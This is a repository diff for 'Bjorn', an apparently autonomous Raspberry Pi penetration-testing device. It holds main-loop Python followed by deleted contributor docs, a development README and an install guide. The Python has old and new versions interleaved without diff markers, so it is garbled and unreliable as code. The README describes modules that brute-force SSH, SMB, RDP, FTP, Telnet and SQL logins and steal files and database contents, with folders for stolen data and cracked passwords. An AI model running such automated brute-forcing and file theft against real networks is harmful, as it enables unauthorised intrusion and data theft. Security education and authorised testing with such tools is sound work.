if self.orchestrator_thread is not None and self.orchestrator_thread.is_alive():
self.stop_orchestrator()
else:
self.check_and_start_orchestrator()
time.sleep(5)
backoff_s = 1.0 # Reset backoff on success
except Exception as exc:
logger.error(f"Bjorn main loop error: {exc}")
logger.error_throttled(
"Bjorn main loop entering backoff due to repeated errors",
key="bjorn_main_loop_backoff",
interval_s=60,
)
time.sleep(backoff_s)
backoff_s = min(backoff_s * 2.0, 30.0)
def check_and_start_orchestrator(self):
"""Check Wi-Fi and start the orchestrator if connected."""
if self.is_wifi_connected():
if self.shared_data.operation_mode == "MANUAL":
return
if self.is_network_connected():
self.wifi_connected = True
if self.orchestrator_thread is None or not self.orchestrator_thread.is_alive():
self.start_orchestrator()
else:
self.wifi_connected = False
logger.info("Waiting for Wi-Fi connection to start Orchestrator...")
logger.info_throttled(
"Waiting for network connection to start Orchestrator...",
key="bjorn_wait_network",
interval_s=30,
)
def start_orchestrator(self):
"""Start the orchestrator thread."""
self.is_wifi_connected() # reCheck if Wi-Fi is connected before starting the orchestrator
if self.wifi_connected: # Check if Wi-Fi is connected before starting the orchestrator
if self.orchestrator_thread is None or not self.orchestrator_thread.is_alive():
logger.info("Starting Orchestrator thread...")
self.shared_data.orchestrator_should_exit = False
self.shared_data.manual_mode = False
self.orchestrator = Orchestrator()
self.orchestrator_thread = threading.Thread(target=self.orchestrator.run)
self.orchestrator_thread.start()
logger.info("Orchestrator thread started, automatic mode activated.")
else:
logger.info("Orchestrator thread is already running.")
else:
logger.warning("Cannot start Orchestrator: Wi-Fi is not connected.")
with self._orch_lock:
# Re-check network inside lock
if not self.network_connected:
return
if self.orchestrator_thread is not None and self.orchestrator_thread.is_alive():
logger.debug("Orchestrator thread is already running.")
return
logger.info("Starting Orchestrator thread...")
self.shared_data.orchestrator_should_exit = False
self.orchestrator = Orchestrator()
self.orchestrator_thread = threading.Thread(
target=self.orchestrator.run,
daemon=True,
name="OrchestratorMain",
)
self.orchestrator_thread.start()
logger.info("Orchestrator thread started.")
def stop_orchestrator(self):
"""Stop the orchestrator thread."""
self.shared_data.manual_mode = True
logger.info("Stop button pressed. Manual mode activated & Stopping Orchestrator...")
if self.orchestrator_thread is not None and self.orchestrator_thread.is_alive():
logger.info("Stopping Orchestrator thread...")
with self._orch_lock:
thread = self.orchestrator_thread
if thread is None or not thread.is_alive():
self.orchestrator_thread = None
self.orchestrator = None
return
# Keep MANUAL sticky so supervisor does not auto-restart orchestration.
try:
self.shared_data.operation_mode = "MANUAL"
except Exception:
pass
now = time.time()
if now - self._last_orch_stop_attempt >= 10.0:
logger.info("Stop requested: stopping Orchestrator")
self._last_orch_stop_attempt = now
self.shared_data.orchestrator_should_exit = True
self.orchestrator_thread.join()
logger.info("Orchestrator thread stopped.")
self.shared_data.bjornorch_status = "IDLE"
self.shared_data.bjornstatustext2 = ""
self.shared_data.manual_mode = True
else:
logger.info("Orchestrator thread is not running.")
self.shared_data.queue_event.set() # Wake up thread
thread.join(timeout=10.0)
if thread.is_alive():
logger.warning_throttled(
"Orchestrator thread did not stop gracefully",
key="orch_stop_not_graceful",
interval_s=20,
)
return
def is_wifi_connected(self):
"""Checks for Wi-Fi connectivity using the nmcli command."""
result = subprocess.Popen(['nmcli', '-t', '-f', 'active', 'dev', 'wifi'], stdout=subprocess.PIPE, text=True).communicate()[0]
self.wifi_connected = 'yes' in result
return self.wifi_connected
self.orchestrator_thread = None
self.orchestrator = None
self.shared_data.bjorn_orch_status = "IDLE"
self.shared_data.bjorn_status_text2 = ""
def is_network_connected(self):
"""Checks for network connectivity with throttling and low-CPU checks."""
now = time.time()
# Throttling: Do not scan more than once every 10 seconds
if now - self._last_net_check < 10:
return self.network_connected
self._last_net_check = now
def interface_has_ip(interface_name):
try:
# OPTIMIZATION: Check /sys/class/net first to avoid spawning subprocess if interface doesn't exist
if not os.path.exists(f"/sys/class/net/{interface_name}"):
return False
# Check for IP address
result = subprocess.run(
["ip", "-4", "addr", "show", interface_name],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
text=True,
timeout=2,
)
if result.returncode != 0:
return False
return "inet " in result.stdout
except Exception:
return False
eth_connected = interface_has_ip("eth0")
wifi_connected = interface_has_ip("wlan0")
self.network_connected = eth_connected or wifi_connected
if self.network_connected != self.previous_network_connected:
if self.network_connected:
logger.info(f"Network status changed: Connected (eth0={eth_connected}, wlan0={wifi_connected})")
else:
logger.warning("Network status changed: Connection lost")
self.previous_network_connected = self.network_connected
return self.network_connected
@staticmethod
def start_display():
"""Start the display thread"""
def start_display(old_display=None):
# Ensure the previous Display's controller is fully stopped to release frames
if old_display is not None:
try:
old_display.display_controller.stop(timeout=3.0)
except Exception:
pass
display = Display(shared_data)
display_thread = threading.Thread(target=display.run)
display_thread = threading.Thread(
target=display.run,
daemon=True,
name="DisplayMain",
)
display_thread.start()
return display_thread
return display_thread, display
def handle_exit(sig, frame, display_thread, bjorn_thread, web_thread):
"""Handles the termination of the main, display, and web threads."""
def _request_shutdown():
"""Signals all threads to stop."""
shared_data.should_exit = True
shared_data.orchestrator_should_exit = True # Ensure orchestrator stops
shared_data.display_should_exit = True # Ensure display stops
shared_data.webapp_should_exit = True # Ensure web server stops
handle_exit_display(sig, frame, display_thread)
if display_thread.is_alive():
display_thread.join()
if bjorn_thread.is_alive():
bjorn_thread.join()
if web_thread.is_alive():
web_thread.join()
logger.info("Main loop finished. Clean exit.")
sys.exit(0) # Used sys.exit(0) instead of exit(0)
shared_data.orchestrator_should_exit = True
shared_data.display_should_exit = True
shared_data.webapp_should_exit = True
shared_data.queue_event.set()
def handle_exit(
sig,
frame,
display_thread,
bjorn_thread,
web_thread_obj,
health_thread=None,
runtime_state_thread=None,
from_signal=False,
):
global _shutdown_started
with _shutdown_lock:
if _shutdown_started:
if from_signal:
logger.warning("Forcing exit (SIGINT/SIGTERM received twice)")
os._exit(130)
return
_shutdown_started = True
logger.info(f"Shutdown signal received: {sig}")
_request_shutdown()
# 1. Stop Display (handles EPD cleanup)
try:
handle_exit_display(sig, frame, display_thread)
except Exception:
pass
# 2. Stop Health Monitor
try:
if health_thread and hasattr(health_thread, "stop"):
health_thread.stop()
except Exception:
pass
# 2b. Stop Runtime State Updater
try:
if runtime_state_thread and hasattr(runtime_state_thread, "stop"):
runtime_state_thread.stop()
except Exception:
pass
# 3. Stop Web Server
try:
if web_thread_obj and hasattr(web_thread_obj, "shutdown"):
web_thread_obj.shutdown()
except Exception:
pass
# 4. Join all threads
for thread in (display_thread, bjorn_thread, web_thread_obj, health_thread, runtime_state_thread):
try:
if thread and thread.is_alive():
thread.join(timeout=5.0)
except Exception:
pass
# 5. Close Database (Prevent corruption)
try:
if hasattr(shared_data, "db") and hasattr(shared_data.db, "close"):
shared_data.db.close()
except Exception as exc:
logger.error(f"Database shutdown error: {exc}")
logger.info("Bjorn stopped. Clean exit.")
_release_instance_lock()
if from_signal:
sys.exit(0)
def _install_thread_excepthook():
def _hook(args):
logger.error(f"Unhandled thread exception: {args.thread.name} - {args.exc_type.__name__}: {args.exc_value}")
# We don't force shutdown here to avoid killing the app on minor thread glitches,
# unless it's critical. The Crash Shield will handle restarts.
threading.excepthook = _hook
if __name__ == "__main__":
logger.info("Starting threads")
if not _acquire_instance_lock():
sys.exit(1)
atexit.register(_release_instance_lock)
_install_thread_excepthook()
display_thread = None
display_instance = None
bjorn_thread = None
health_thread = None
runtime_state_thread = None
last_gc_time = time.time()
try:
logger.info("Loading shared data config...")
logger.info("Bjorn Startup: Loading config...")
shared_data.load_config()
logger.info("Starting display thread...")
shared_data.display_should_exit = False # Initialize display should_exit
display_thread = Bjorn.start_display()
logger.info("Starting Runtime State Updater...")
runtime_state_thread = RuntimeStateUpdater(shared_data)
runtime_state_thread.start()
logger.info("Starting Bjorn thread...")
logger.info("Starting Display...")
shared_data.display_should_exit = False
display_thread, display_instance = Bjorn.start_display()
logger.info("Starting Bjorn Core...")
bjorn = Bjorn(shared_data)
shared_data.bjorn_instance = bjorn # Assigner l'instance de Bjorn à shared_data
bjorn_thread = threading.Thread(target=bjorn.run)
shared_data.bjorn_instance = bjorn
bjorn_thread = threading.Thread(target=bjorn.run, daemon=True, name="BjornMain")
bjorn_thread.start()
if shared_data.config["websrv"]:
logger.info("Starting the web server...")
web_thread.start()
if shared_data.config.get("websrv", False):
logger.info("Starting Web Server...")
if not web_thread.is_alive():
web_thread.start()
signal.signal(signal.SIGINT, lambda sig, frame: handle_exit(sig, frame, display_thread, bjorn_thread, web_thread))
signal.signal(signal.SIGTERM, lambda sig, frame: handle_exit(sig, frame, display_thread, bjorn_thread, web_thread))
health_interval = int(shared_data.config.get("health_log_interval", 60))
health_thread = HealthMonitor(shared_data, interval_s=health_interval)
health_thread.start()
except Exception as e:
logger.error(f"An exception occurred during thread start: {e}")
handle_exit_display(signal.SIGINT, None)
exit(1)
# Signal Handlers
exit_handler = lambda s, f: handle_exit(
s,
f,
display_thread,
bjorn_thread,
web_thread,
health_thread,
runtime_state_thread,
True,
)
signal.signal(signal.SIGINT, exit_handler)
signal.signal(signal.SIGTERM, exit_handler)
# --- SUPERVISOR LOOP (Crash Shield) ---
restart_times = []
max_restarts = 5
restart_window_s = 300
logger.info("Bjorn Supervisor running.")
while not shared_data.should_exit:
time.sleep(2) # CPU Friendly polling
now = time.time()
# --- OPTIMIZATION: Periodic Garbage Collection ---
# Forces cleanup of circular references and free RAM every 2 mins
if now - last_gc_time > 120:
gc.collect()
last_gc_time = now
logger.debug("System: Forced Garbage Collection executed.")
# --- CRASH SHIELD: Bjorn Thread ---
if bjorn_thread and not bjorn_thread.is_alive() and not shared_data.should_exit:
restart_times = [t for t in restart_times if (now - t) <= restart_window_s]
restart_times.append(now)
if len(restart_times) <= max_restarts:
logger.warning("Crash Shield: Restarting Bjorn Main Thread")
bjorn_thread = threading.Thread(target=bjorn.run, daemon=True, name="BjornMain")
bjorn_thread.start()
else:
logger.critical("Crash Shield: Bjorn exceeded restart budget. Shutting down.")
_request_shutdown()
break
# --- CRASH SHIELD: Display Thread ---
if display_thread and not display_thread.is_alive() and not shared_data.should_exit:
restart_times = [t for t in restart_times if (now - t) <= restart_window_s]
restart_times.append(now)
if len(restart_times) <= max_restarts:
logger.warning("Crash Shield: Restarting Display Thread")
display_thread, display_instance = Bjorn.start_display(old_display=display_instance)
else:
logger.critical("Crash Shield: Display exceeded restart budget. Shutting down.")
_request_shutdown()
break
# --- CRASH SHIELD: Runtime State Updater ---
if runtime_state_thread and not runtime_state_thread.is_alive() and not shared_data.should_exit:
restart_times = [t for t in restart_times if (now - t) <= restart_window_s]
restart_times.append(now)
if len(restart_times) <= max_restarts:
logger.warning("Crash Shield: Restarting Runtime State Updater")
runtime_state_thread = RuntimeStateUpdater(shared_data)
runtime_state_thread.start()
else:
logger.critical("Crash Shield: Runtime State Updater exceeded restart budget. Shutting down.")
_request_shutdown()
break
# Exit cleanup
if health_thread:
health_thread.stop()
if runtime_state_thread:
runtime_state_thread.stop()
handle_exit(
signal.SIGTERM,
None,
display_thread,
bjorn_thread,
web_thread,
health_thread,
runtime_state_thread,
False,
)
except Exception as exc:
logger.critical(f"Critical bootstrap failure: {exc}")
_request_shutdown()
# Try to clean up anyway
try:
handle_exit(
signal.SIGTERM,
None,
display_thread,
bjorn_thread,
web_thread,
health_thread,
runtime_state_thread,
False,
)
except:
pass
sys.exit(1)

View File

@@ -1,40 +0,0 @@
# 📝 Code of Conduct
Take Note About This... **Take Note...**
## 🤝 Our Commitment
We are committed to fostering an open and welcoming environment for all contributors. As such, everyone who participates in **Bjorn** is expected to adhere to the following code of conduct.
## 🌟 Expected Behavior
- **Respect:** Be respectful of differing viewpoints and experiences.
- **Constructive Feedback:** Provide constructive feedback and be open to receiving it.
- **Empathy and Kindness:** Show empathy and kindness towards other contributors.
- **Respect for Maintainers:** Respect the decisions of the maintainers.
- **Positive Intent:** Assume positive intent in interactions with others.
## 🚫 Unacceptable Behavior
- **Harassment or Discrimination:** Harassment or discrimination in any form.
- **Inappropriate Language or Imagery:** Use of inappropriate language or imagery.
- **Personal Attacks:** Personal attacks or insults.
- **Public or Private Harassment:** Public or private harassment.
## 📢 Reporting Misconduct
If you encounter any behavior that violates this code of conduct, please report it by contacting [bjorn-cyberviking@outlook.com](mailto:bjorn-cyberviking@outlook.com). All complaints will be reviewed and handled appropriately.
## ⚖️ Enforcement
Instances of unacceptable behavior may be addressed by the project maintainers, who are responsible for clarifying and enforcing this code of conduct. Violations may result in temporary or permanent bans from the project and related spaces.
## 🙏 Acknowledgments
This code of conduct is adapted from the [Contributor Covenant, version 2.0](https://www.contributor-covenant.org/version/2/0/code_of_conduct.html).
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

View File

@@ -1,51 +0,0 @@
# 🤝 Contributing to Bjorn
We welcome contributions to Bjorn! To make sure the process goes smoothly, please follow these guidelines:
## 📋 Code of Conduct
Please note that all participants in our project are expected to follow our [Code of Conduct](#-code-of-conduct). Make sure to review it before contributing.
## 🛠 How to Contribute
1. **Fork the repository**:
Fork the project to your GitHub account using the GitHub interface.
2. **Create a new branch**:
Use a descriptive branch name for your feature or bugfix:
git checkout -b feature/your-feature-name
3. **Make your changes**:
Implement your feature or fix the bug in your branch. Make sure to include tests where applicable and follow coding standards.
4. **Test your changes**:
Run the test suite to ensure your changes dont break any functionality:
- ...
5. **Commit your changes**:
Use meaningful commit messages that explain what you have done:
git commit -m "Add feature/fix: Description of changes"
6. **Push your changes**:
Push your changes to your fork:
git push origin feature/your-feature-name
7. **Submit a Pull Request**:
Create a pull request on the main repository, detailing the changes youve made. Link any issues your changes resolve and provide context.
## 📑 Guidelines for Contributions
- **Lint your code** before submitting a pull request. We use [ESLint](https://eslint.org/) for frontend and [pylint](https://www.pylint.org/) for backend linting.
- Ensure **test coverage** for your code. Uncovered code may delay the approval process.
- Write clear, concise **commit messages**.
Thank you for helping improve!
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

View File

@@ -1,373 +0,0 @@
# 🖲️ Bjorn Development
<p align="center">
<img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="98">
</p>
## 📚 Table of Contents
- [Design](#-design)
- [Educational Aspects](#-educational-aspects)
- [Disclaimer](#-disclaimer)
- [Extensibility](#-extensibility)
- [Development Status](#-development-status)
- [Project Structure](#-project-structure)
- [Core Files](#-core-files)
- [Actions](#-actions)
- [Data Structure](#-data-structure)
- [Detailed Project Description](#-detailed-project-description)
- [Behaviour of Bjorn](#-behavior-of-bjorn)
- [Running Bjorn](#-running-bjorn)
- [Manual Start](#-manual-start)
- [Service Control](#-service-control)
- [Fresh Start](#-fresh-start)
- [Important Configuration Files](#-important-configuration-files)
- [Shared Configuration](#-shared-configuration-shared_configjson)
- [Actions Configuration](#-actions-configuration-actionsjson)
- [E-Paper Display Support](#-e-paper-display-support)
- [Ghosting Removed](#-ghosting-removed)
- [Development Guidelines](#-development-guidelines)
- [Adding New Actions](#-adding-new-actions)
- [Testing](#-testing)
- [Web Interface](#-web-interface)
- [Project Roadmap](#-project-roadmap)
- [Current Focus](#-future-plans)
- [Future Plans](#-future-plans)
- [License](#-license)
## 🎨 Design
- **Portability**: Self-contained and portable device, ideal for penetration testing.
- **Modularity**: Extensible architecture allowing addition of new actions.
- **Visual Interface**: The e-Paper HAT provides a visual interface for monitoring the ongoing actions, displaying results or stats, and interacting with Bjorn .
## 📔 Educational Aspects
- **Learning Tool**: Designed as an educational tool to understand cybersecurity concepts and penetration testing techniques.
- **Practical Experience**: Provides a practical means for students and professionals to familiarize themselves with network security practices and vulnerability assessment tools.
## ✒️ Disclaimer
- **Ethical Use**: This project is strictly for educational purposes.
- **Responsibility**: The author and contributors disclaim any responsibility for misuse of Bjorn.
- **Legal Compliance**: Unauthorized use of this tool for malicious activities is prohibited and may be prosecuted by law.
## 🧩 Extensibility
- **Evolution**: The main purpose of Bjorn is to gain new actions and extend his arsenal over time.
- **Modularity**: Actions are designed to be modular and can be easily extended or modified to add new functionality.
- **Possibilities**: From capturing pcap files to cracking hashes, man-in-the-middle attacks, and more—the possibilities are endless.
- **Contribution**: It's up to the user to develop new actions and add them to the project.
## 🔦 Development Status
- **Project Status**: Ongoing development.
- **Current Version**: Scripted auto-installer, or manual installation. Not yet packaged with Raspberry Pi OS.
- **Reason**: The project is still in an early stage, requiring further development and debugging.
### 🗂️ Project Structure
```
Bjorn/
├── Bjorn.py
├── comment.py
├── display.py
├── epd_helper.py
├── init_shared.py
├── kill_port_8000.sh
├── logger.py
├── orchestrator.py
├── requirements.txt
├── shared.py
├── utils.py
├── webapp.py
├── __init__.py
├── actions/
│ ├── ftp_connector.py
│ ├── ssh_connector.py
│ ├── smb_connector.py
│ ├── rdp_connector.py
│ ├── telnet_connector.py
│ ├── sql_connector.py
│ ├── steal_files_ftp.py
│ ├── steal_files_ssh.py
│ ├── steal_files_smb.py
│ ├── steal_files_rdp.py
│ ├── steal_files_telnet.py
│ ├── steal_data_sql.py
│ ├── nmap_vuln_scanner.py
│ ├── scanning.py
│ └── __init__.py
├── backup/
│ ├── backups/
│ └── uploads/
├── config/
├── data/
│ ├── input/
│ │ └── dictionary/
│ ├── logs/
│ └── output/
│ ├── crackedpwd/
│ ├── data_stolen/
│ ├── scan_results/
│ ├── vulnerabilities/
│ └── zombies/
└── resources/
└── waveshare_epd/
```
### ⚓ Core Files
#### Bjorn.py
The main entry point for the application. It initializes and runs the main components, including the network scanner, orchestrator, display, and web server.
#### comment.py
Handles generating all the Bjorn comments displayed on the e-Paper HAT based on different themes/actions and statuses.
#### display.py
Manages the e-Paper HAT display, updating the screen with Bjorn character, the dialog/comments, and the current information such as network status, vulnerabilities, and various statistics.
#### epd_helper.py
Handles the low-level interactions with the e-Paper display hardware.
#### logger.py
Defines a custom logger with specific formatting and handlers for console and file logging. It also includes a custom log level for success messages.
#### orchestrator.py
Bjorns AI, a heuristic engine that orchestrates the different actions such as network scanning, vulnerability scanning, attacks, and file stealing. It loads and executes actions based on the configuration and sets the status of the actions and Bjorn.
#### shared.py
Defines the `SharedData` class that holds configuration settings, paths, and methods for updating and managing shared data across different modules.
#### init_shared.py
Initializes shared data that is used across different modules. It loads the configuration and sets up necessary paths and variables.
#### utils.py
Contains utility functions used throughout the project.
#### webapp.py
Sets up and runs a web server to provide a web interface for changing settings, monitoring and interacting with Bjorn.
### ▶️ Actions
#### actions/scanning.py
Conducts network scanning to identify live hosts and open ports. It updates the network knowledge base (`netkb`) and generates scan results.
#### actions/nmap_vuln_scanner.py
Performs vulnerability scanning using Nmap. It parses the results and updates the vulnerability summary for each host.
#### Protocol Connectors
- **ftp_connector.py**: Brute-force attacks on FTP services.
- **ssh_connector.py**: Brute-force attacks on SSH services.
- **smb_connector.py**: Brute-force attacks on SMB services.
- **rdp_connector.py**: Brute-force attacks on RDP services.
- **telnet_connector.py**: Brute-force attacks on Telnet services.
- **sql_connector.py**: Brute-force attacks on SQL services.
#### File Stealing Modules
- **steal_files_ftp.py**: Steals files from FTP servers.
- **steal_files_smb.py**: Steals files from SMB shares.
- **steal_files_ssh.py**: Steals files from SSH servers.
- **steal_files_telnet.py**: Steals files from Telnet servers.
- **steal_data_sql.py**: Extracts data from SQL databases.
### 📇 Data Structure
#### Network Knowledge Base (netkb.csv)
Located at `data/netkb.csv`. Stores information about:
- Known hosts and their status. (Alive or offline)
- Open ports and vulnerabilities.
- Action execution history. (Success or failed)
**Preview Example:**
![netkb1](https://github.com/infinition/Bjorn/assets/37984399/f641a565-2765-4280-a7d7-5b25c30dcea5)
![netkb2](https://github.com/infinition/Bjorn/assets/37984399/f08114a2-d7d1-4f50-b1c4-a9939ba66056)
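Because `netkb.csv` is a plain CSV file, it can be inspected with the standard library. A minimal sketch (the column names below are illustrative; check the header of your generated `netkb.csv` for the exact fields):

```python
import csv
import io

# Illustrative sample; the real netkb.csv is produced by actions/scanning.py.
sample = """MAC Address,IPs,Hostnames,Alive,Ports
aa:bb:cc:dd:ee:01,192.168.1.10,server1,1,22;80
aa:bb:cc:dd:ee:02,192.168.1.11,printer,0,
"""

def alive_hosts(csv_text):
    """Return the rows whose 'Alive' flag is set."""
    reader = csv.DictReader(io.StringIO(csv_text))
    return [row for row in reader if row.get("Alive") == "1"]

hosts = alive_hosts(sample)
print(len(hosts))        # number of currently alive hosts
print(hosts[0]["IPs"])   # IP of the first alive host
```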
#### Scan Results
Located in `data/output/scan_results/`.
This file is generated everytime the network is scanned. It is used to consolidate the data and update netkb.
**Example:**
![Scan result](https://github.com/infinition/Bjorn/assets/37984399/eb4a313a-f90c-4c43-b699-3678271886dc)
#### Live Status (livestatus.csv)
Contains real-time information displayed on the e-Paper HAT:
- Total number of known hosts.
- Currently alive hosts.
- Open ports count.
- Other runtime statistics.
## 📖 Detailed Project Description
### 👀 Behavior of Bjorn
Once launched, Bjorn performs the following steps:
1. **Initialization**: Loads configuration, initializes shared data, and sets up necessary components such as the e-Paper HAT display.
2. **Network Scanning**: Scans the network to identify live hosts and open ports. Updates the network knowledge base (`netkb`) with the results.
3. **Orchestration**: Orchestrates different actions based on the configuration and network knowledge base. This includes performing vulnerability scanning, attacks, and file stealing.
4. **Vulnerability Scanning**: Performs vulnerability scans on identified hosts and updates the vulnerability summary.
5. **Brute-Force Attacks and File Stealing**: Starts brute-force attacks and steals files based on the configuration criteria.
6. **Display Updates**: Continuously updates the e-Paper HAT display with current information such as network status, vulnerabilities, and various statistics. Bjorn also displays random comments based on different themes and statuses.
7. **Web Server**: Provides a web interface for monitoring and interacting with Bjorn.
## ▶️ Running Bjorn
### 📗 Manual Start
To manually start Bjorn (without the service, ensure the service is stopped « sudo systemctl stop bjorn.service »):
```bash
cd /home/bjorn/Bjorn
# Run Bjorn
sudo python Bjorn.py
```
### 🕹️ Service Control
Control the Bjorn service:
```bash
# Start Bjorn
sudo systemctl start bjorn.service
# Stop Bjorn
sudo systemctl stop bjorn.service
# Check status
sudo systemctl status bjorn.service
# View logs
sudo journalctl -u bjorn.service
```
### 🪄 Fresh Start
To reset Bjorn to a clean state:
```bash
sudo rm -rf /home/bjorn/Bjorn/config/*.json \
/home/bjorn/Bjorn/data/*.csv \
/home/bjorn/Bjorn/data/*.log \
/home/bjorn/Bjorn/data/output/data_stolen/* \
/home/bjorn/Bjorn/data/output/crackedpwd/* \
/home/bjorn/Bjorn/config/* \
/home/bjorn/Bjorn/data/output/scan_results/* \
/home/bjorn/Bjorn/__pycache__ \
/home/bjorn/Bjorn/config/__pycache__ \
/home/bjorn/Bjorn/data/__pycache__ \
/home/bjorn/Bjorn/actions/__pycache__ \
/home/bjorn/Bjorn/resources/__pycache__ \
/home/bjorn/Bjorn/web/__pycache__ \
/home/bjorn/Bjorn/*.log \
/home/bjorn/Bjorn/resources/waveshare_epd/__pycache__ \
/home/bjorn/Bjorn/data/logs/* \
/home/bjorn/Bjorn/data/output/vulnerabilities/* \
/home/bjorn/Bjorn/data/logs/*
```
Everything will be recreated automatically at the next launch of Bjorn.
## ❇️ Important Configuration Files
### 🔗 Shared Configuration (`shared_config.json`)
Defines various settings for Bjorn, including:
- Boolean settings (`manual_mode`, `websrv`, `debug_mode`, etc.).
- Time intervals and delays.
- Network settings.
- Port lists and blacklists.
These settings are accessible on the webpage.
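A fragment of `shared_config.json` might look like the following (values are illustrative defaults, not a complete schema):

```json
{
    "manual_mode": false,
    "websrv": true,
    "debug_mode": false,
    "startup_delay": 0,
    "health_log_interval": 60
}
```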
### 🛠️ Actions Configuration (`actions.json`)
Lists the actions to be performed by Bjorn, including (dynamically generated with the content of the folder):
- Module and class definitions.
- Port assignments.
- Parent-child relationships.
- Action status definitions.
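Since the file is regenerated from the contents of the `actions/` folder, treat the following as a sketch of what an entry can carry rather than an authoritative schema (the field names here are illustrative):

```json
{
    "b_module": "ssh_connector",
    "b_class": "SSHBruteforce",
    "b_port": 22,
    "b_parent": null,
    "b_status": "SSHBruteforce"
}
```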
## 📟 E-Paper Display Support
Currently, hardcoded for the 2.13-inch V2 & V4 e-Paper HAT.
My program automatically detect the screen model and adapt the python expressions into my code.
For other versions:
- As I don't have the v1 and v3 to validate my algorithm, I just hope it will work properly.
### 🍾 Ghosting Removed!
In my journey to make Bjorn work with the different screen versions, I struggled, hacking several parameters and found out that it was possible to remove the ghosting of screens! I let you see this, I think this method will be very useful for all other projects with the e-paper screen!
## ✍️ Development Guidelines
### Adding New Actions
1. Create a new action file in `actions/`.
2. Implement required methods:
- `__init__(self, shared_data)`
- `execute(self, ip, port, row, status_key)`
3. Add the action to `actions.json`.
4. Follow existing action patterns.
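A skeleton following these conventions might look like this (the class and module names are examples; check the existing connectors for the exact return contract of `execute`):

```python
# actions/example_action.py -- illustrative skeleton, not a shipped module.

class ExampleAction:
    """Minimal action implementing the interface expected by the orchestrator."""

    def __init__(self, shared_data):
        # shared_data exposes configuration, paths and runtime state.
        self.shared_data = shared_data

    def execute(self, ip, port, row, status_key):
        # 'row' is the host's netkb entry; 'status_key' names this action's
        # result column. Return a status string for the knowledge base.
        try:
            # ... perform the actual work against ip:port here ...
            return "success"
        except Exception:
            return "failed"
```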
### 🧪 Testing
1. Create a test environment.
2. Use an isolated network.
3. Follow ethical guidelines.
4. Document test cases.
## 💻 Web Interface
- **Access**: `http://[device-ip]:8000`
- **Features**:
- Real-time monitoring with a console.
- Configuration management.
- Viewing results. (Credentials and files)
- System control.
## 🧭 Project Roadmap
### 🪛 Current Focus
- Stability improvements.
- Bug fixes.
- Service reliability.
- Documentation updates.
### 🧷 Future Plans
- Additional attack modules.
- Enhanced reporting.
- Improved user interface.
- Extended protocol support.
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.
## 🔧 Installation and Configuration
<p align="center">
<img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="98">
</p>
## 📚 Table of Contents
- [Prerequisites](#-prerequisites)
- [Quick Install](#-quick-install)
- [Manual Install](#-manual-install)
- [License](#-license)
Use Raspberry Pi Imager to install your OS
https://www.raspberrypi.com/software/
### 📌 Prerequisites for RPI zero W (32bits)
![image](https://github.com/user-attachments/assets/3980ec5f-a8fc-4848-ab25-4356e0529639)
- Raspberry Pi OS installed.
- Stable:
- System: 32-bit
- Kernel version: 6.6
- Debian version: 12 (bookworm) '2024-10-22-raspios-bookworm-armhf-lite'
- Username and hostname set to `bjorn`.
- 2.13-inch e-Paper HAT connected to GPIO pins.
### 📌 Prerequisites for RPI zero W2 (64bits)
![image](https://github.com/user-attachments/assets/e8d276be-4cb2-474d-a74d-b5b6704d22f5)
I did not develop Bjorn on the Raspberry Pi Zero W2 (64-bit), but several users have confirmed that the installation works perfectly.
- Raspberry Pi OS installed.
- Stable:
- System: 64-bit
- Kernel version: 6.6
- Debian version: 12 (bookworm) '2024-10-22-raspios-bookworm-arm64-lite'
- Username and hostname set to `bjorn`.
- 2.13-inch e-Paper HAT connected to GPIO pins.
At the moment, the e-Paper screens V2 and V4 have been tested and implemented.
I just hope the V1 & V3 will work the same.
### ⚡ Quick Install
The fastest way to install Bjorn is using the automatic installation script:
```bash
# Download and run the installer
wget https://raw.githubusercontent.com/infinition/Bjorn/refs/heads/main/install_bjorn.sh
sudo chmod +x install_bjorn.sh
sudo ./install_bjorn.sh
# Choose option 1 for automatic installation. It may take a while, as many packages and modules will be installed. You must reboot at the end.
```
### 🧰 Manual Install
#### Step 1: Activate SPI & I2C
```bash
sudo raspi-config
```
- Navigate to **"Interface Options"**.
- Enable **SPI**.
- Enable **I2C**.
#### Step 2: System Dependencies
```bash
# Update system
sudo apt-get update && sudo apt-get upgrade -y
# Install required packages
sudo apt install -y \
libjpeg-dev \
zlib1g-dev \
libpng-dev \
python3-dev \
libffi-dev \
libssl-dev \
libgpiod-dev \
libi2c-dev \
libatlas-base-dev \
build-essential \
python3-pip \
wget \
lsof \
git \
libopenjp2-7 \
nmap \
libopenblas-dev \
bluez-tools \
bluez \
dhcpcd5 \
bridge-utils \
python3-pil
# Update Nmap scripts database
sudo nmap --script-updatedb
```
#### Step 3: Bjorn Installation
```bash
# Clone the Bjorn repository
cd /home/bjorn
git clone https://github.com/infinition/Bjorn.git
cd Bjorn
# Install Python dependencies system-wide
sudo pip install -r requirements.txt --break-system-packages
# I have not yet managed to get a stable installation inside a virtual environment, so the dependencies are installed system-wide (hence --break-system-packages). This has caused no issues so far; you can still try a virtual environment if you want.
```
##### 3.1: Configure E-Paper Display Type
Choose your e-Paper HAT version by modifying the configuration file:
1. Open the configuration file:
```bash
sudo vi /home/bjorn/Bjorn/config/shared_config.json
```
2. Press `i` to enter insert mode.
3. Locate the line containing `"epd_type"` and change the value according to your screen model:
   - For 2.13 V1: `"epd_type": "epd2in13",`
   - For 2.13 V2: `"epd_type": "epd2in13_V2",`
   - For 2.13 V3: `"epd_type": "epd2in13_V3",`
   - For 2.13 V4: `"epd_type": "epd2in13_V4",`
4. Press `Esc` to exit insert mode.
5. Type `:wq` and press `Enter` to save and quit.
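If you prefer not to edit the file by hand, the same change can be scripted — a sketch that assumes `shared_config.json` is plain JSON with a top-level `epd_type` key, as described above:

```python
import json

def set_epd_type(config_path, epd_type):
    """Rewrite the "epd_type" value in shared_config.json in place."""
    with open(config_path) as f:
        cfg = json.load(f)
    cfg["epd_type"] = epd_type
    with open(config_path, "w") as f:
        json.dump(cfg, f, indent=4)

# e.g. set_epd_type("/home/bjorn/Bjorn/config/shared_config.json", "epd2in13_V4")
```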
#### Step 4: Configure File Descriptor Limits
